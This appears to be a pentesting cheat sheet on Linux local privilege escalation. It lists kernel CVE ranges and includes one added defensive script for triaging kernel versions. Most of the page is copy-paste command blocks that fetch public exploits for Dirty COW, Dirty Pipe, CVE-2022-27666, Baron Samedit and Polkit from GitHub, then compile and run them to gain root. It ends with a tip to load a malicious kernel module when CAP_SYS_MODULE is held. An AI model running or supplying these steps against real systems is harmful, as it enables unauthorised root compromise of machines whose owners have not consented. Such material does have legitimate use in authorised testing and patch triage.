Low Level Exploits

Check Kernel Version for Known CVEs

```bash
uname -r
```

Example vulnerable ranges:

- **Dirty COW** (CVE-2016-5195): Linux ≤ 4.8
- **Dirty Pipe** (CVE-2022-0847): Linux 5.8+ < 5.10.102 / < 5.15.25 / < 5.17.9
- **Other kernel 0-days**: search on [Exploit-DB](https://www.exploit-db.com/), [CVE Details](https://www.cvedetails.com/), or use `searchsploit`.
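
The version check above, as an added example that is not part of the original page: a shell function that compares a release string against the Dirty COW and Dirty Pipe ranges in this list, so hosts can be triaged for patching. The function names are this example's own, counting branches with no listed fix as in range is an assumption, and it needs `sort -V`.

```bash
# Added example. Thresholds are the ones in the list above; a hit means
# "check the vendor advisory", because distro kernels backport fixes.

# "5.10.0-21-amd64" -> "5.10.0": drop everything after the numeric prefix.
base_version() { printf '%s\n' "$1" | sed 's/[^0-9.].*$//; s/\.$//'; }

# ver_lt A B: true when A sorts strictly before B (needs sort -V).
ver_lt() {
    [ "$1" != "$2" ] &&
        [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$1" ]
}
ver_le() { [ "$1" = "$2" ] || ver_lt "$1" "$2"; }

# check_kernel RELEASE: print which listed ranges RELEASE falls in, or "none".
check_kernel() {
    v=$(base_version "$1")
    branch=$(printf '%s\n' "$v" | cut -d. -f1,2)
    hits=""

    # Dirty COW (CVE-2016-5195): listed as Linux <= 4.8, compared by branch.
    if ver_le "$branch" 4.8; then hits="dirty-cow"; fi

    # Dirty Pipe (CVE-2022-0847): 5.8 and later, below the listed fixed
    # release of the 5.10, 5.15 and 5.17 branches.
    if ver_le 5.8 "$branch" && ver_le "$branch" 5.17; then
        case "$branch" in
            5.10) fixed=5.10.102 ;;
            5.15) fixed=5.15.25 ;;
            5.17) fixed=5.17.9 ;;
            *)    fixed="" ;;  # assumption: no listed fix, treat as in range
        esac
        if [ -z "$fixed" ] || ver_lt "$v" "$fixed"; then
            hits="${hits:+$hits }dirty-pipe"
        fi
    fi
    printf '%s\n' "${hits:-none}"
}

# Constructed sample release strings, followed by the running kernel.
for r in 4.4.0-31-generic 5.10.0-21-amd64 5.15.25 6.1.0-13-amd64 "$(uname -r)"; do
    printf '%-20s %s\n' "$r" "$(check_kernel "$r")"
done
```

The release string reported by `uname -r` on a distribution kernel often does not carry the upstream patch level, so confirm any hit against the package version and the vendor's advisory.
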

**Dirty COW**

```bash
wget https://raw.githubusercontent.com/dirtycow/dirtycow/master/dirtyc0w.c
gcc dirtyc0w.c -o dirtycow
./dirtycow
```

**Dirty Pipe**

```bash
git clone https://github.com/ashishb/dirtypipe.git
cd dirtypipe
gcc dirtypipe.c -o dirtypipe
./dirtypipe
```

**CVE-2022-27666 (Netfilter Privilege Escalation)**

```bash
git clone https://github.com/niklasb/CVE-2022-27666.git
cd CVE-2022-27666
make
./cve-2022-27666
```

**CVE-2021-3156 (Sudo “Baron Samedit”)**

Sudo ≤ 1.8.31p2 is vulnerable.

```bash
git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
gcc cve-2021-3156.c -o exploit
./exploit
```

**CVE-2021-3560 (Polkit)**

```bash
git clone https://github.com/berdav/CVE-2021-3560.git
cd CVE-2021-3560
gcc cve-2021-3560.c -o exploit
./exploit
```

Check and Load Kernel Modules

```bash
lsmod                # list loaded modules
sudo modprobe tun    # check if tun module can be loaded
```

- If you have `CAP_SYS_MODULE`, you can compile and load a malicious kernel module to gain root.